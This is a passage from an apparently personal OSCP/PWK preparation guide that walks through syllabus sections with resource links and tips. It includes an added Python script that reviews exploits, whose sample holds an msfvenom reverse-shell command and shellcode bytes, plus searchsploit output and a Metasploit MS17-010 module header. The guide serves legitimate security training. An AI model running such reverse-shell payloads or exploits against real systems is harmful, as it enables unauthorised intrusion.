  &lt;li&gt;Know your tools! There are certain tools that you cannot use for the exam. However, that does not mean you should skip over them. Take some time to understand them because you may have to use them on an actual engagement or in the field.&lt;/li&gt;
  &lt;li&gt;Remember Offensive Security’s motto: TRY HARDER&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;As of now Offensive Security has restricted the following tools:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Commercial tools or services (Metasploit Pro, Burp Pro, etc.)&lt;/li&gt;
  &lt;li&gt;Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)&lt;/li&gt;
  &lt;li&gt;Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)&lt;/li&gt;
  &lt;li&gt;Features in other tools that utilize either forbidden or restricted exam limitations&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Reference: &lt;a href=&quot;https://support.offensive-security.com/oscp-exam-guide/&quot;&gt;https://support.offensive-security.com/oscp-exam-guide/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Most importantly: Have fun! You will learn a lot from this course, take your time to understand the material and this guide. 
Do not forget to take breaks and spend time away from the electronics. Trust me you do not want to burn yourself out.&lt;/p&gt;

&lt;p&gt;Course Syllabus:&lt;/p&gt;

&lt;p&gt;The 2nd most important resource that I used to help me prepare for the course:
&lt;a href=&quot;https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf&quot;&gt;https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the syllabus I will break down each section, providing the resources I used to prepare for the course. Once I finish going through the syllabus, I will also provide some extra resources that came in handy. You don’t need to use this guide in order; feel free to jump around as it suits you.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Getting Comfortable with Kali Linux&lt;/li&gt;
  &lt;li&gt;Essential Tools in Kali&lt;/li&gt;
  &lt;li&gt;Passive Reconnaissance&lt;/li&gt;
  &lt;li&gt;Active Reconnaissance&lt;/li&gt;
  &lt;li&gt;Vulnerability Scanning&lt;/li&gt;
  &lt;li&gt;Buffer Overflows&lt;/li&gt;
  &lt;li&gt;Working with Public Exploits&lt;/li&gt;
  &lt;li&gt;File Transfer&lt;/li&gt;
  &lt;li&gt;Privilege Escalation&lt;/li&gt;
  &lt;li&gt;Client-Side Attacks&lt;/li&gt;
  &lt;li&gt;Web Application Attacks&lt;/li&gt;
  &lt;li&gt;Password Attacks&lt;/li&gt;
  &lt;li&gt;Tunneling/Pivoting&lt;/li&gt;
  &lt;li&gt;Introduction to the Metasploit Framework&lt;/li&gt;
  &lt;li&gt;Antivirus Bypassing&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-1-getting-comfortable-with-kali-linux&quot;&gt;Section 1: Getting Comfortable with Kali Linux&lt;/h1&gt;
&lt;p&gt;Kali Linux Revealed and Online Course: 
A good foundational course that helped me understand more about Kali Linux and it has a nice Linux Fundamentals section as well.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Book Link: &lt;a href=&quot;https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf&quot;&gt;https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Online Course Link: &lt;a href=&quot;https://kali.training/lessons/introduction/&quot;&gt;https://kali.training/lessons/introduction/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Bash Scripting: 
The Bash Guide: a good guide to get you into bash scripting&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://guide.bash.academy/&quot;&gt;https://guide.bash.academy/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Linux Journey: 
A huge guide to learn about a variety of different things in Linux. All the lessons are free.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://linuxjourney.com/&quot;&gt;https://linuxjourney.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Explainshell: 
Awesome resource that parses man pages from the Ubuntu Manpage Repository and breaks down each part of the command you give it. It is a quick way to decode an unfamiliar command line, but refer to the man pages themselves if you have any questions.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.explainshell.com/&quot;&gt;https://www.explainshell.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/TJNulls_Preparation_Guide_for_PWK/image.png&quot; alt=&quot;alt-text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hands on challenge to get comfortable with Linux:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Overthewire Bandit: &lt;a href=&quot;https://overthewire.org/wargames/bandit/&quot;&gt;https://overthewire.org/wargames/bandit/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Cmdchallenge.com: &lt;a href=&quot;https://cmdchallenge.com/&quot;&gt;https://cmdchallenge.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;HackerRank Linux Shell: &lt;a href=&quot;https://www.hackerrank.com/domains/shell&quot;&gt;https://www.hackerrank.com/domains/shell&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Books:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;The Linux Command Line (2nd Edition is coming soon!): &lt;a href=&quot;https://nostarch.com/tlcl2&quot;&gt;https://nostarch.com/tlcl2&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Linux Basics for Hackers: &lt;a href=&quot;https://nostarch.com/linuxbasicsforhackers&quot;&gt;https://nostarch.com/linuxbasicsforhackers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-2-essential-tools-in-kali&quot;&gt;Section 2: Essential Tools in Kali&lt;/h1&gt;
&lt;p&gt;Netcat: the TCP/IP Swiss Army knife. Experiment with this tool and understand what it does, because you will be using it almost every day during your time in the course: catching reverse shells, grabbing banners, and moving files.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;SANS Netcat Cheatsheet: &lt;a href=&quot;https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf&quot;&gt;https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ncat: a better version of netcat in my opinion. It supports SSL/TLS and is part of the Nmap project.&lt;/p&gt;

&lt;p&gt;TCPDump: command-line network analysis tool. Very useful and good to know when you are on a system without a GUI. Here is a good cheat sheet I used for tcpdump when I needed to troubleshoot my exploits: &lt;a href=&quot;https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/&quot;&gt;https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Daniel Miessler TCPDump Guide: &lt;a href=&quot;https://danielmiessler.com/study/tcpdump/&quot;&gt;https://danielmiessler.com/study/tcpdump/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wireshark: GUI-based network analysis tool. There are a lot of free PCAP samples online that you can use to understand how Wireshark works. Be careful when downloading some of these PCAP files, because they may contain malware :D&lt;/p&gt;

&lt;p&gt;PCAP Samples:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Netresec: &lt;a href=&quot;https://www.netresec.com/?page=pcapfiles&quot;&gt;https://www.netresec.com/?page=pcapfiles&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Malware Traffic Analysis: &lt;a href=&quot;https://www.malware-traffic-analysis.net/&quot;&gt;https://www.malware-traffic-analysis.net/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Packettotal (Just like virustotal but for PCAP Analysis): &lt;a href=&quot;https://packettotal.com/&quot;&gt;https://packettotal.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-3-passive-reconnaissance&quot;&gt;Section 3: Passive Reconnaissance&lt;/h1&gt;
&lt;p&gt;Take some time to learn about these tricks and techniques. They will certainly come in handy!&lt;/p&gt;

&lt;p&gt;Google Dorks: crafted Google search queries that can expose sensitive information about a target, such as indexed login pages, configuration files, or verbose error messages.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;SANS Google Dork Cheatsheet: &lt;a href=&quot;https://www.sans.org/security-resources/GoogleCheatSheet.pdf&quot;&gt;https://www.sans.org/security-resources/GoogleCheatSheet.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Google Hacking Database: &lt;a href=&quot;https://www.exploit-db.com/google-hacking-database&quot;&gt;https://www.exploit-db.com/google-hacking-database&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Netcraft: &lt;a href=&quot;https://netcraft.com/&quot;&gt;https://netcraft.com/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Email Harvesting:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;theharvester: &lt;a href=&quot;https://github.com/laramies/theharvester&quot;&gt;https://github.com/laramies/theharvester&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;recon-ng: &lt;a href=&quot;https://bitbucket.org/LaNMaSteR53/recon-ng/overview&quot;&gt;https://bitbucket.org/LaNMaSteR53/recon-ng/overview&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Additional Resources: 
Tools I did not use in the lab but I used them for preparation and they have come in handy for other tests.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Domaintools: &lt;a href=&quot;http://whois.domaintools.com/&quot;&gt;http://whois.domaintools.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;MX Toolbox: &lt;a href=&quot;https://mxtoolbox.com/DNSLookup.aspx&quot;&gt;https://mxtoolbox.com/DNSLookup.aspx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-4-active-reconnaissance&quot;&gt;Section 4: Active Reconnaissance&lt;/h1&gt;
&lt;p&gt;Introduction to DNS: 
If you do not know what DNS is or how it works, here is a great guide that I used to better understand it from Digital Ocean: 
&lt;a href=&quot;https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts&quot;&gt;https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you think you have a good understanding of what DNS is then you will also need to understand how to perform forward and reverse lookups. In addition, you should also know how zone transfers work and how to perform them. Performing these tests will certainly help you better understand what your targets are in the lab. For more information about these techniques check out this article here: 
&lt;a href=&quot;https://resources.infosecinstitute.com/dns-enumeration-techniques-in-linux/#gref&quot;&gt;https://resources.infosecinstitute.com/dns-enumeration-techniques-in-linux/#gref&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tools for DNS Enumeration:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Dnsrecon Created by Darkoperator: &lt;a href=&quot;https://github.com/darkoperator/dnsrecon&quot;&gt;https://github.com/darkoperator/dnsrecon&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;network-scanning&quot;&gt;Network Scanning:&lt;/h3&gt;

&lt;p&gt;Nmap: 
A tool that you should 100% learn about. You will probably use this every day (if not most of the time while you are in the lab). I highly recommend you take some time to learn what the tool does, how each command switch works, each scanning technique you can run, and its other capabilities. 
Nmap can determine what hosts are online, what services they are running, what operating system each host is running, and dozens of other characteristics. In addition, one of the most powerful features you should learn is the Nmap Scripting Engine (NSE). With NSE scripts you can automate a wide variety of networking tasks in your scans, including vulnerability detection and exploitation. 
Here are the resources that I used to learn more about Nmap:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Nmap Official Guide: I used this more than the man pages. I highly recommend purchasing the full book since the official guide is missing a few chapters, such as “Detecting and Subverting Firewalls and Intrusion Detection Systems”, “Optimizing Nmap Performance”, “Port Scanning Techniques and Algorithms”, “Host Discovery (Ping Scanning)”, and more. &lt;a href=&quot;https://nmap.org/book/toc.html&quot;&gt;https://nmap.org/book/toc.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Link for Nmap Network Scanning Book (if you want to purchase it): &lt;a href=&quot;https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717&quot;&gt;https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;SANS Nmap Cheatsheet: &lt;a href=&quot;https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.1.pdf&quot;&gt;https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.1.pdf&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Nmap Scripting Engine (NSE): &lt;a href=&quot;https://nmap.org/book/man-nse.html&quot;&gt;https://nmap.org/book/man-nse.html&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;ZephrFish Nmap Blog: &lt;a href=&quot;https://blog.zsec.uk/nmap-rtfm/&quot;&gt;https://blog.zsec.uk/nmap-rtfm/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;service-enumeration&quot;&gt;Service Enumeration:&lt;/h3&gt;
&lt;p&gt;There are a variety of services running on so many systems…take the time to understand them! Do not just scan them and move on. Take some time to look at each of them because they could be a key for you to obtain shell access on a system!&lt;/p&gt;

&lt;p&gt;Abatchy provided a link from 0day security that gave me a lot of ideas and things to look for that I may have missed when I skipped some of the services in the lab. You can find that resource here: 
&lt;a href=&quot;http://0daysecurity.com/penetration-testing/enumeration.html&quot;&gt;http://0daysecurity.com/penetration-testing/enumeration.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Highoncoffee Penetration Testing Cheatsheet: &lt;a href=&quot;https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/&quot;&gt;https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;section-5-vulnerability-scanning&quot;&gt;Section 5: Vulnerability Scanning&lt;/h1&gt;
&lt;p&gt;I did not spend too much time in this section for preparation because vulnerability scanners are simple and easy to configure. The purpose of a vulnerability scanner is to identify security holes in services or in an operating system; these scanners rely on a database of plugins or checks that contains the information needed to conduct a scan. 
A word of caution! Be careful when you use vulnerability scanners on your targets, because some plugins or features can impact the target: taking down a service, locking out user accounts, or even crashing the system. 
The syllabus recommends OpenVAS since it is a full-featured vulnerability scanner. However, there are other vulnerability scanners out there and I highly recommend playing with Nessus: 
&lt;a href=&quot;https://www.tenable.com/products/nessus/nessus-professional&quot;&gt;https://www.tenable.com/products/nessus/nessus-professional&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The reason I am suggesting Nessus is that it is more stable on Kali Linux and has a simple, straightforward interface. I was also able to use the Nessus Home key for most of my testing, which helped me get more familiar with how these vulnerability scanners work. Nessus is a really popular tool for vulnerability scanning in the infosec world and I certainly encourage you to play with it!&lt;/p&gt;

&lt;p&gt;For instructions on how to install Nessus on Kali Linux you can find it here: 
&lt;a href=&quot;https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux&quot;&gt;https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For obtaining a Nessus key you can grab one here: 
&lt;a href=&quot;https://www.tenable.com/products/nessus-home&quot;&gt;https://www.tenable.com/products/nessus-home&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;section-6-buffer-overflows&quot;&gt;Section 6: Buffer Overflows&lt;/h1&gt;
&lt;p&gt;My favorite section to learn about! The material provided in the PWK was fantastic and really straightforward. Throughout the internet you will find a variety of resources to help you understand buffer overflows. With that being said, I will provide some of my notes and the resources that helped me understand how buffer overflows work.&lt;/p&gt;

&lt;p&gt;Corelan Team:  A huge shout out to these guys because their articles from information security to exploit development are absolutely incredible!
They have an article they posted about Stack Based Overflows that gave me a better understanding of identifying a buffer overflow in an application:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Part 1: 
&lt;a href=&quot;https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/&quot;&gt;https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Part 2: 
&lt;a href=&quot;https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/&quot;&gt;https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once I finished reading the articles I started going through write-ups and forums where people manually identified buffer overflows in certain applications. For these walkthroughs I used Exploit-DB to check whether it hosted the vulnerable application, which it did in many cases. I won’t provide any of these walkthroughs, but I will at least provide the binaries that you can use to manually identify buffer overflows.&lt;/p&gt;

&lt;p&gt;Windows Binaries (I recommend that you run these on 32-bit Windows 7/XP):&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Vulnserver: &lt;a href=&quot;https://samsclass.info/127/proj/vuln-server.htm&quot;&gt;https://samsclass.info/127/proj/vuln-server.htm&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Minishare 1.4.1: &lt;a href=&quot;https://www.exploit-db.com/exploits/636&quot;&gt;https://www.exploit-db.com/exploits/636&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Savant Web Server 3.1: &lt;a href=&quot;https://www.exploit-db.com/exploits/10434&quot;&gt;https://www.exploit-db.com/exploits/10434&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Freefloat FTP Server 1.0: &lt;a href=&quot;https://www.exploit-db.com/exploits/40673&quot;&gt;https://www.exploit-db.com/exploits/40673&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Core FTP Server 1.2: &lt;a href=&quot;https://www.exploit-db.com/exploits/39480&quot;&gt;https://www.exploit-db.com/exploits/39480&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Linux Binaries:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Linux Buffer Overflow: &lt;a href=&quot;https://samsclass.info/127/proj/lbuf1.htm&quot;&gt;https://samsclass.info/127/proj/lbuf1.htm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Vulnerable Boxes:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Brainpan 1:  &lt;a href=&quot;https://www.vulnhub.com/entry/brainpan-1,51/&quot;&gt;https://www.vulnhub.com/entry/brainpan-1,51/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Pinky’s Palace version 1: &lt;a href=&quot;https://www.vulnhub.com/entry/pinkys-palace-v1,225/&quot;&gt;https://www.vulnhub.com/entry/pinkys-palace-v1,225/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Other Resources:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Whitepaper Introduction to Immunity Debugger: &lt;a href=&quot;https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982&quot;&gt;https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Buffer Overflows for Dummies: &lt;a href=&quot;https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481&quot;&gt;https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Vortex Stack Buffer Overflow Practice: &lt;a href=&quot;https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/&quot;&gt;https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Smashing the Stack For Fun and Profit: &lt;a href=&quot;http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf&quot;&gt;http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;section-7-handling-public-exploits&quot;&gt;Section 7: Handling Public Exploits&lt;/h1&gt;

&lt;p&gt;There will come a time when you need to use a public exploit on your target to see if you can obtain a shell. You may need to modify the shellcode, or other parts of the exploit, to match your target and your attacking system before it will connect back to you.
A word of advice:&lt;/p&gt;

&lt;p&gt;Before you run a public exploit, take some time to review the code and understand what it is supposed to do. If you do not understand how the code works…do some research!!! I am absolutely positive you can find proofs of concept and walkthroughs online that explain how the exploit works. Not all exploits work right out of the box: you will usually need to set the target address, the callback address and port, and sometimes the return address, offsets or shellcode before the exploit can reach back to your attacking system. If you do not review the exploit code and make those changes, you run the risk that the exploit fails, crashes the target system or service, or leaves a shell open that other people can connect to.&lt;/p&gt;
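&lt;p&gt;The review described above, as an added example that is not part of the original guide: it lists every hard-coded address and port in an exploit so the callback can be pointed at your own machine, and decodes the embedded shellcode and checks it for bytes the target is known to drop. The exploit text it reads is a constructed sample written for this example, not a real public exploit, and the variable names it looks for (lhost, lport, target, port and so on) are an assumption about common exploit style.&lt;/p&gt;

```python
# Added example, not part of the original guide: a pre-flight review of a
# downloaded exploit. Lists every hard-coded address and port (so the
# callback can be pointed at your own box), decodes embedded shellcode and
# checks it for bad characters. SAMPLE_EXPLOIT is a constructed sample
# written for this example, not a real public exploit.
import re

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# name = value pairs such as lhost = '10.0.0.1' or LPORT=443; the name list
# is an assumption about common exploit style. \x27 and \x22 are the quotes.
ASSIGN_RE = re.compile(
    r'(?i)\b(lhost|lport|rhost|rport|host|port|target|ip)\s*=\s*[\x27\x22]?([\w.]+)')
# Runs of \xNN escapes long enough to be shellcode rather than a return address
BLOB_RE = re.compile(r'(?:\\x[0-9a-fA-F]{2}){8,}')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

SAMPLE_EXPLOIT = '''#!/usr/bin/python
# Constructed sample for this example; not a real exploit
import socket
target = '192.168.1.20'
port = 21
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=443 -f python
shellcode = (
    '\\xdb\\xc0\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x33\\x00\\x43\\x17'
)
buf = 'A' * 230 + '\\xaf\\x11\\x50\\x62' + '\\x90' * 16 + shellcode
s = socket.socket()
s.connect((target, port))
'''

def decode_blob(escaped):
    '''Turn a source literal made of \\xNN escapes into raw bytes.'''
    return bytes(int(h, 16) for h in HEX_RE.findall(escaped))

def find_badchars(shellcode, badchars=b'\x00\x0a\x0d'):
    '''Map each bad byte present in the shellcode to the offsets where it occurs.

    Which bytes are bad depends on the target (\\x00 ends C strings, \\x0a and
    \\x0d end lines in text protocols); these three are the usual starting set,
    not a complete list.
    '''
    hits = {}
    for off, b in enumerate(shellcode):
        if b in badchars:
            hits.setdefault(b, []).append(off)
    return hits

def review_exploit(source, my_ip, my_port):
    '''Summarise what must be checked or changed before the exploit is run.'''
    addresses = sorted(set(IPV4_RE.findall(source)))
    assigns = {name.lower(): value for name, value in ASSIGN_RE.findall(source)}
    blobs = [decode_blob(m) for m in BLOB_RE.findall(source)]
    lhost, lport = assigns.get('lhost'), assigns.get('lport')
    return {
        'addresses': addresses,          # every IP literal; eyeball each one
        'assignments': assigns,          # host/port variables to retarget
        'callback': (lhost, lport),
        # A callback that is not ours hands the shell to whoever owns that IP
        'callback_is_mine': lhost == my_ip and lport == str(my_port),
        'shellcode_lengths': [len(b) for b in blobs],
        'badchars': [find_badchars(b) for b in blobs],
    }

if __name__ == '__main__':
    import json
    print(json.dumps(review_exploit(SAMPLE_EXPLOIT, '10.10.14.5', 443), indent=2))
```

&lt;p&gt;Run it over the downloaded file before touching the target. Anything in addresses or assignments that is not your lab IP and listener port needs changing, a callback_is_mine of False means the shell would go to someone else’s machine, and a non-empty badchars entry means the shellcode must be regenerated with those bytes excluded (msfvenom -b) before it has any chance of running.&lt;/p&gt;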

&lt;p&gt;Places to find exploits:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.exploit-db.com/&quot;&gt;https://www.exploit-db.com/&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://packetstormsecurity.com/files/tags/exploit/&quot;&gt;https://packetstormsecurity.com/files/tags/exploit/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tools for finding exploits:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Searchsploit: a command-line search tool for Exploit-DB that ships with an offline copy of the Exploit Database, so you can search it without internet access.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Command Examples:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;searchsploit ms17-010&lt;/code&gt;: finds all entries/exploits linked to MS17-010 (the search is case-insensitive by default)&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                     |  Path
                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - &apos;EternalRomance&apos;/&apos;EternalSynergy&apos;/&apos;EternalChampion&apos; SMB Remote Code Execution  | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                      | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - &apos;SrvOs2FeaToNt&apos; SMB Remote Code Execution (MS17-010)      | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Windows 7/2008 R2 - &apos;EternalBlue&apos; SMB Remote Code Execution (MS17-010)           | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - &apos;EternalBlue&apos; SMB Remote Code Execution  | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - &apos;EternalBlue&apos; SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb&lt;/code&gt;: the -x switch lets you examine the exploit code and the information in its header. You can also feed an Nmap XML output file (written with -oX) to searchsploit with the --nmap switch so it looks up exploits matching the services it found.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb

Snippet of the exploit: 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
#  Local Security Settings &amp;gt;
#   Local Policies &amp;gt;
#    Security Options &amp;gt;
#     Network Access: Sharing and security model for local accounts

class MetasploitModule &amp;lt; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      &apos;Name&apos;           =&amp;gt; &apos;MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution&apos;,
      &apos;Description&apos;    =&amp;gt; %q{
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
        primitive. This will then be used to overwrite the connection session information with as an
        Administrator session. From there, the normal psexec payload code execution is done.

        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
        named pipe.
        
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Play with some of the other command switches that Searchsploit has because it will make it much easier for you to find exploits on your kali box.&lt;/p&gt;

&lt;h1 id=&quot;section-8-transferring-files-to-your-target&quot;&gt;Section 8: Transferring Files to your target:&lt;/h1&gt;
&lt;p&gt;Depending on the target system you obtain access to, you may not have the ability to transfer exploits or other tools you need onto that system. With this being said, you will need to learn some techniques for transferring files to and from your target system. Here are a few guides I used to get a better understanding of how to transfer files onto Windows and Linux systems:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;
    &lt;p&gt;Awakened: Transfer files from Kali to the target machine
&lt;a href=&quot;https://awakened1712.github.io/oscp/oscp-transfer-files/&quot;&gt;https://awakened1712.github.io/oscp/oscp-transfer-files/&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Ropnop Transferring Files from Linux to Windows (post-exploitation):
